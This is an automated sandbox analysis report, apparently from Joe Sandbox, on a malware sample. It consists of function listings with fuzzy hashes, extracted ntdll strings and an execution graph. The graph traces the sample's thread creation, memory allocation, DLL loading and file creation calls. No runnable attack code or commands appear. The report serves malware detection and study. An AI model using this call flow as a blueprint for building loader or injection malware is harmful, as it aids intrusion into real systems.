                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 063c5818420b8e14ceffdecefa8bf356981291257ff4ed931026fbb0e2b4a5e7
                                                                    • Instruction ID: bb0fc05164a41cffa88443ed8930738916679968129e4b8d20b1cd7298d0ca29
                                                                    • Opcode Fuzzy Hash: 063c5818420b8e14ceffdecefa8bf356981291257ff4ed931026fbb0e2b4a5e7
                                                                    • Instruction Fuzzy Hash: C190022560141502D111715C4404616005AA7D0251F99C422E1028955ECA658A92A332
                                                                    Function 015C2EA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ced0fe9f353cc4c957996182d0e2dff02f910d3a34bf6ea5453c93a8f0f8e3f5
                                                                    • Instruction ID: a10ea5b1b49401103b3c7e89ff443e700b2ef2dca5704d64b084817bc9e67ec1
                                                                    • Opcode Fuzzy Hash: ced0fe9f353cc4c957996182d0e2dff02f910d3a34bf6ea5453c93a8f0f8e3f5
                                                                    • Instruction Fuzzy Hash: 0090027520141402D150715C44047460055A7D0311F59C411E5068954EC6998ED56766
                                                                    Function 015C3010 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a570a6e8b62c2d55332f0323bb50bd3df91f05f80af02ca6f9c63b64204acf7b
                                                                    • Instruction ID: 6e11b301b1e5d679338f34be26605230980b7b313d58cfcf179f70ae7b38fabc
                                                                    • Opcode Fuzzy Hash: a570a6e8b62c2d55332f0323bb50bd3df91f05f80af02ca6f9c63b64204acf7b
                                                                    • Instruction Fuzzy Hash: 2190022520185442D150725C4804B0F4155A7E1212F99C419E415A954CC95589555722
                                                                    Function 015C3090 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c5c76180e75328a054764732b47ee8e55785368c47a30223fe61a1e040cf110
                                                                    • Instruction ID: 23652f4cb1eed4e045e01957d1acf2d303262e271e67ee88e8078c6c2727d63d
                                                                    • Opcode Fuzzy Hash: 6c5c76180e75328a054764732b47ee8e55785368c47a30223fe61a1e040cf110
                                                                    • Instruction Fuzzy Hash: 4490022524141802D150715C84147070056E7D0611F59C411E0028954DC6568A6567B2
                                                                    Function 015C39B0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c4cee6686dd0bfc35830b1a3c4b9ba4d73cf72f70ce44807a889063fc82a1a6
                                                                    • Instruction ID: e7bf0fa18eb0b26801074fa43c88f5656f4364297a54920d002c65b2672b6d64
                                                                    • Opcode Fuzzy Hash: 7c4cee6686dd0bfc35830b1a3c4b9ba4d73cf72f70ce44807a889063fc82a1a6
                                                                    • Instruction Fuzzy Hash: 5C90022524546102D160715C44046164055B7E0211F59C421E0818994DC59589556322
                                                                    Function 015C3D70 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02af11a7ca02bb3584aa329fdf7afd4491d6b50aa1c56a06d5d55fd60f9f721c
                                                                    • Instruction ID: aa725f459790cba2def0f6a6e4b0b8efc53b1658e344e3bee68b7acd38b39e66
                                                                    • Opcode Fuzzy Hash: 02af11a7ca02bb3584aa329fdf7afd4491d6b50aa1c56a06d5d55fd60f9f721c
                                                                    • Instruction Fuzzy Hash: 2390023920141402D520715C58046460096A7D0311F59D811E0428958DC69489A1A322
                                                                    Function 015C3D10 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f710c4cd3b8f75ec0441d110072aeb897a48a8cf3e066458b04187550c337dfa
                                                                    • Instruction ID: 585d7bbc8541c0cf1da761b23117c331db02a71f3fd78a9f494cf37925d3e516
                                                                    • Opcode Fuzzy Hash: f710c4cd3b8f75ec0441d110072aeb897a48a8cf3e066458b04187550c337dfa
                                                                    • Instruction Fuzzy Hash: 19900235202411429550725C5804A4E4155A7E1312B99D815E0019954CC95489615322
                                                                    Function 015C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: c5cf3e87f4e3bc7ea2ace73a3e2dae1e9e047a5190a105fbfa1ee5b527d3efd6
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 015C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: d7d9a9b0565dc15008d6c2e28a885919ae743d8982f35589a18b6316553f8e8a
                                                                    • Instruction ID: 2b7bb88380ec38175e6bf33c6112e596dddf10b3cd876d2927a02cec5fdccd0c
                                                                    • Opcode Fuzzy Hash: d7d9a9b0565dc15008d6c2e28a885919ae743d8982f35589a18b6316553f8e8a
                                                                    • Instruction Fuzzy Hash: 3E51D5B5A00217BFCB21DF9C889097EFBF8BB48640F54856DE559DB641D374DE408BA0
                                                                    Function 01632410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 81fbb2777364b2622b454d84d97daca794324218c082281891cfd9f07ad19437
                                                                    • Instruction ID: 8b2997ef3320371d1b03a677342c0c6aada99ad48040a83c3f79676665531769
                                                                    • Opcode Fuzzy Hash: 81fbb2777364b2622b454d84d97daca794324218c082281891cfd9f07ad19437
                                                                    • Instruction Fuzzy Hash: 5F51D575A00646AEDB30DF5CCCA097FBBF9EF84210B44846DE596D7682E774EB408760
                                                                    Function 015B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015F46FC
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015F4742
                                                                    • ExecuteOptions, xrefs: 015F46A0
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 015F4787
                                                                    • Execute=1, xrefs: 015F4713
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015F4655
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015F4725
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: 492ca75c1f59117c1d6910e65ad01fb697d19a4d462569da0bb888bb84711561
                                                                    • Instruction ID: c343a8852812dbf8b0217eedd61392df3789f08f75314c1c039b9841484a60f5
                                                                    • Opcode Fuzzy Hash: 492ca75c1f59117c1d6910e65ad01fb697d19a4d462569da0bb888bb84711561
                                                                    • Instruction Fuzzy Hash: B551073160021A6AEB25AEA8DCC5FFE77B8FF98704F1404ADD605AF1D1EB709A418B50
                                                                    Function 015CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: 2f559efefcc8951717151e5c5143b8922ecaa0da24e156ba564431998f0ef308
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: 8181AE70E052499EEF258EECC8927BEBBF1BF45BA0F18461DD851AF291C73499808B51
                                                                    Function 016320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 17a875539a9a2896c18f83ce8fbaf13c0449504966e77a6be47e487bdbef4c2b
                                                                    • Instruction ID: 598f2b505bf77c3751d2b711d65a423f3d3f0b630fdf82a6cd7fdb045c04d0ea
                                                                    • Opcode Fuzzy Hash: 17a875539a9a2896c18f83ce8fbaf13c0449504966e77a6be47e487bdbef4c2b
                                                                    • Instruction Fuzzy Hash: 6C21657AA0011AABDB20DF7DDD50AEEBBF8EF94651F44011AEA05D7240E730DA118BE1
                                                                    Function 015AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015F02E7
                                                                    • RTL: Re-Waiting, xrefs: 015F031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015F02BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: df93d3f7e499a382d9caa9ec4441226b77fb2696285a7d6d239e85b98a483646
                                                                    • Instruction ID: 6d73a8be95a5ea08f7ee8a00d80267c6e77f59b592d5a086e41d1ca875a65c87
                                                                    • Opcode Fuzzy Hash: df93d3f7e499a382d9caa9ec4441226b77fb2696285a7d6d239e85b98a483646
                                                                    • Instruction Fuzzy Hash: 17E1BD306487429FE725CF28C884B2EBBE1BB84314F544A5EF6A58F2E2D774D845CB52
                                                                    Function 015BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015F7BAC
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015F7B7F
                                                                    • RTL: Resource at %p, xrefs: 015F7B8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: fbe7b36f2d3d188ffa2e878d258e0cd6c9e357b84272cad68081577244b1396e
                                                                    • Instruction ID: eb05cafacf26ffe6f7094615e66879c03d88ff8bfc50069d43ea84a889aed690
                                                                    • Opcode Fuzzy Hash: fbe7b36f2d3d188ffa2e878d258e0cd6c9e357b84272cad68081577244b1396e
                                                                    • Instruction Fuzzy Hash: B741E2313047029FD725DE29CC80BAAB7E5FF89710F100A1DEA56DF280EBB1E4058B91
                                                                    Function 015BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015F7294
                                                                    • RTL: Re-Waiting, xrefs: 015F72C1
                                                                    • RTL: Resource at %p, xrefs: 015F72A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: 34e21f8650d3e8868cf5d4cf2124f9f6a2c828df007926bb7921a1f071ffc184
                                                                    • Instruction ID: 032379c021b3e5e802bc8793d6f0462ceafac3dfcb11824a238bbc12a068d9ee
                                                                    • Opcode Fuzzy Hash: 34e21f8650d3e8868cf5d4cf2124f9f6a2c828df007926bb7921a1f071ffc184
                                                                    • Instruction Fuzzy Hash: 3041D235600602AFD721DE69CC81F6AB7A6FB98710F10061DFA559F280DB61F85287D1
                                                                    Function 01632300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 629bdef663f398b254899e823d84915ff628262974d2360f6b1ca4efa49224e4
                                                                    • Instruction ID: 05dd07261b90260e5601310c43b006f8850dccbcb0f138fb2ff94d5899c71d7e
                                                                    • Opcode Fuzzy Hash: 629bdef663f398b254899e823d84915ff628262974d2360f6b1ca4efa49224e4
                                                                    • Instruction Fuzzy Hash: DC319872A012199FDB20DF2DDC50BEE77F8FF84610F44055DE949E7240EB30AA548BA0
                                                                    Function 015C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: 689a397e2e1bae3c369113f2b8cdda744f9dfc136999eebc0a32e79a900391ec
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: E2916171A0021B9EEB24DFEDC8816BEBBA5BF48B20F14451EE965AF6C0D73099418F51
                                                                    Function 01589126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: eabf4cc99dc9c324d6f765278eb1764bbf7bc76f1f922d90a13eeb52719c3bfc
                                                                    • Instruction ID: 01508cdafb11ea6e67aa65c27993febb71824e304bdc142dfdc3bc643187e61d
                                                                    • Opcode Fuzzy Hash: eabf4cc99dc9c324d6f765278eb1764bbf7bc76f1f922d90a13eeb52719c3bfc
                                                                    • Instruction Fuzzy Hash: 1E811C71D0066A9BDB35DB54CC44BEEB7B8BB48714F0041DAEA1ABB640D7705E84CFA0

                                                                    Execution Graph

                                                                    Execution Coverage:2.6%
                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:439
                                                                    Total number of Limit Nodes:71
                                                                    execution_graph 96670 2e09de0 96671 2e09def 96670->96671 96672 2e09e30 96671->96672 96673 2e09e1d CreateThread 96671->96673 97182 2e0b820 97183 2e2b6f0 NtAllocateVirtualMemory 97182->97183 97184 2e0ce91 97183->97184 96674 2e110e0 96675 2e110f9 96674->96675 96680 2e14880 96675->96680 96677 2e11117 96678 2e11163 96677->96678 96679 2e11150 PostThreadMessageW 96677->96679 96679->96678 96682 2e148a4 96680->96682 96681 2e148ab 96681->96677 96682->96681 96684 2e148ca 96682->96684 96687 2e2cc00 LdrLoadDll 96682->96687 96685 2e148e0 LdrLoadDll 96684->96685 96686 2e148f7 96684->96686 96685->96686 96686->96677 96687->96684 96688 2e17460 96689 2e1747c 96688->96689 96692 2e174cf 96688->96692 96689->96692 96698 2e296e0 96689->96698 96690 2e17607 96692->96690 96702 2e16880 NtClose LdrInitializeThunk LdrInitializeThunk 96692->96702 96693 2e17497 96701 2e16880 NtClose LdrInitializeThunk LdrInitializeThunk 96693->96701 96695 2e175e1 96695->96690 96703 2e16a50 NtClose LdrInitializeThunk LdrInitializeThunk 96695->96703 96699 2e296fd 96698->96699 96700 2e2970e NtClose 96699->96700 96700->96693 96701->96692 96702->96695 96703->96690 96704 2e28ce0 96705 2e28cfd 96704->96705 96708 3672df0 LdrInitializeThunk 96705->96708 96706 2e28d25 96708->96706 96709 2e28b60 96710 2e28bec 96709->96710 96712 2e28b8b 96709->96712 96714 3672ee0 LdrInitializeThunk 96710->96714 96711 2e28c1d 96714->96711 96715 2e21d60 96719 2e21d79 96715->96719 96716 2e21dc4 96723 2e2b780 96716->96723 96719->96716 96720 2e21e07 96719->96720 96722 2e21e0c 96719->96722 96721 2e2b780 RtlFreeHeap 96720->96721 96721->96722 96726 2e29a50 96723->96726 96725 2e21dd4 96727 2e29a6d 96726->96727 96728 2e29a7e RtlFreeHeap 96727->96728 96728->96725 97185 2e262a0 97186 2e262fa 97185->97186 97188 2e26307 97186->97188 97189 2e23cb0 97186->97189 97190 2e2b6f0 NtAllocateVirtualMemory 97189->97190 97192 2e23cf1 97190->97192 97191 2e23dfe 97191->97188 97192->97191 97193 2e14880 2 API calls 97192->97193 97195 2e23d37 97193->97195 97194 2e23d80 Sleep 97194->97195 97195->97191 97195->97194 96731 2e15f66 96732 2e15f09 96731->96732 96734 2e15f10 96732->96734 96737 2e18420 96732->96737 96736 2e15f3c 96734->96736 96741 2e183a0 96734->96741 96738 2e18433 96737->96738 96748 2e28c30 96738->96748 96740 2e1845e 96740->96734 96742 2e183e4 96741->96742 96747 2e18405 96742->96747 96754 2e28a00 96742->96754 96744 2e183f5 96745 2e18411 96744->96745 96746 2e296e0 NtClose 96744->96746 96745->96734 96746->96747 96747->96734 96749 2e28ca8 96748->96749 96751 2e28c58 96748->96751 96753 3672dd0 LdrInitializeThunk 96749->96753 96750 2e28ccd 96750->96740 96751->96740 96753->96750 96755 2e28a7a 96754->96755 96757 2e28a2b 96754->96757 96759 3674650 LdrInitializeThunk 96755->96759 96756 2e28a9f 96756->96744 96757->96744 96759->96756 97196 2e12aaf 97197 2e12ac2 97196->97197 97198 2e165f0 2 API calls 97197->97198 97199 2e12aca 97198->97199 96770 2e293f0 96771 2e294a1 96770->96771 96773 2e2941c 96770->96773 96772 2e294b7 NtCreateFile 96771->96772 97200 2e13433 97201 2e180a0 2 API calls 97200->97201 97202 2e13443 97201->97202 97203 2e1345f 97202->97203 97204 2e296e0 NtClose 97202->97204 97204->97203 96775 2e09e40 96776 2e0a1ac 96775->96776 96778 2e0a674 96776->96778 96779 2e2b3e0 96776->96779 96778->96778 96780 2e2b406 96779->96780 96785 2e04080 96780->96785 96782 2e2b412 96784 2e2b44b 96782->96784 96788 2e25830 96782->96788 96784->96778 96792 2e13530 96785->96792 96787 2e0408d 96787->96782 96789 2e25891 96788->96789 96791 2e2589e 96789->96791 96810 2e11d10 96789->96810 96791->96784 96793 2e1354a 96792->96793 96795 2e13563 96793->96795 96796 2e2a120 96793->96796 96795->96787 96798 2e2a13a 96796->96798 96797 2e2a169 96797->96795 96798->96797 96803 2e28d30 96798->96803 96801 2e2b780 RtlFreeHeap 96802 2e2a1df 96801->96802 96802->96795 96804 2e28d4d 96803->96804 96807 3672c0a 96804->96807 96805 2e28d79 96805->96801 96808 3672c11 96807->96808 96809 3672c1f LdrInitializeThunk 96807->96809 96808->96805 96809->96805 96811 2e11d4b 96810->96811 96826 2e181b0 96811->96826 96813 2e11d53 96824 2e12023 96813->96824 96837 2e2b860 96813->96837 96815 2e11d69 96816 2e2b860 RtlAllocateHeap 96815->96816 96817 2e11d7a 96816->96817 96818 2e2b860 RtlAllocateHeap 96817->96818 96819 2e11d8b 96818->96819 96825 2e11e22 96819->96825 96844 2e16d50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96819->96844 96821 2e14880 2 API calls 96822 2e11fd2 96821->96822 96840 2e28170 96822->96840 96824->96791 96825->96821 96827 2e181db 96826->96827 96845 2e180a0 96827->96845 96830 2e18221 96834 2e296e0 NtClose 96830->96834 96835 2e1823d 96830->96835 96831 2e18209 96832 2e18214 96831->96832 96833 2e296e0 NtClose 96831->96833 96832->96813 96833->96832 96836 2e18233 96834->96836 96835->96813 96836->96813 96856 2e29a00 96837->96856 96839 2e2b87b 96839->96815 96842 2e281d2 96840->96842 96841 2e281df 96841->96824 96842->96841 96859 2e12040 96842->96859 96844->96825 96846 2e180ba 96845->96846 96850 2e18196 96845->96850 96851 2e28dd0 96846->96851 96849 2e296e0 NtClose 96849->96850 96850->96830 96850->96831 96852 2e28dea 96851->96852 96855 36735c0 LdrInitializeThunk 96852->96855 96853 2e1818a 96853->96849 96855->96853 96857 2e29a1d 96856->96857 96858 2e29a2e RtlAllocateHeap 96857->96858 96858->96839 96860 2e1204a 96859->96860 96876 2e18480 96860->96876 96862 2e12060 96870 2e125b3 96862->96870 96880 2e213a0 96862->96880 96865 2e12275 96888 2e2c950 96865->96888 96866 2e120bb 96866->96870 96883 2e2c820 96866->96883 96868 2e1228a 96872 2e122d7 96868->96872 96894 2e10b80 96868->96894 96869 2e18420 LdrInitializeThunk 96869->96872 96870->96841 96872->96869 96872->96870 96874 2e10b80 LdrInitializeThunk 96872->96874 96873 2e18420 LdrInitializeThunk 96875 2e12425 96873->96875 96874->96872 96875->96872 96875->96873 96877 2e1848d 96876->96877 96878 2e184b5 96877->96878 96879 2e184ae SetErrorMode 96877->96879 96878->96862 96879->96878 96897 2e2b6f0 96880->96897 96882 2e213c1 96882->96866 96884 2e2c830 96883->96884 96885 2e2c836 96883->96885 96884->96865 96886 2e2b860 RtlAllocateHeap 96885->96886 96887 2e2c85c 96886->96887 96887->96865 96889 2e2c8c0 96888->96889 96890 2e2c91d 96889->96890 96891 2e2b860 RtlAllocateHeap 96889->96891 96890->96868 96892 2e2c8fa 96891->96892 96893 2e2b780 RtlFreeHeap 96892->96893 96893->96890 96904 2e29970 96894->96904 96900 2e29850 96897->96900 96899 2e2b721 96899->96882 96901 2e298df 96900->96901 96903 2e29878 96900->96903 96902 2e298f5 NtAllocateVirtualMemory 96901->96902 96902->96899 96903->96899 96905 2e2998d 96904->96905 96908 3672c70 LdrInitializeThunk 96905->96908 96906 2e10ba2 96906->96875 96908->96906 96909 2e170c0 96910 2e170ea 96909->96910 96913 2e18250 96910->96913 96912 2e17114 96914 2e1826d 96913->96914 96920 2e28e20 96914->96920 96916 2e182bd 96917 2e182c4 96916->96917 96925 2e28f00 96916->96925 96917->96912 96919 2e182ed 96919->96912 96921 2e28eb5 96920->96921 96923 2e28e48 96920->96923 96930 3672f30 LdrInitializeThunk 96921->96930 96922 2e28eee 96922->96916 96923->96916 96926 2e28faa 96925->96926 96927 2e28f2b 96925->96927 96931 3672d10 LdrInitializeThunk 96926->96931 96927->96919 96928 2e28fef 96928->96919 96930->96922 96931->96928 96932 2e17640 96933 2e176b2 96932->96933 96934 2e17658 96932->96934 96934->96933 96936 2e1b560 96934->96936 96937 2e1b586 96936->96937 96938 2e1b7b9 96937->96938 96963 2e29ae0 96937->96963 96938->96933 96940 2e1b5fc 96940->96938 96941 2e2c950 2 API calls 96940->96941 96942 2e1b61b 96941->96942 96942->96938 96943 2e1b6f2 96942->96943 96944 2e28d30 LdrInitializeThunk 96942->96944 96946 2e15e60 LdrInitializeThunk 96943->96946 96947 2e1b711 96943->96947 96945 2e1b67d 96944->96945 96945->96943 96949 2e1b686 96945->96949 96946->96947 96962 2e1b7a1 96947->96962 96969 2e288a0 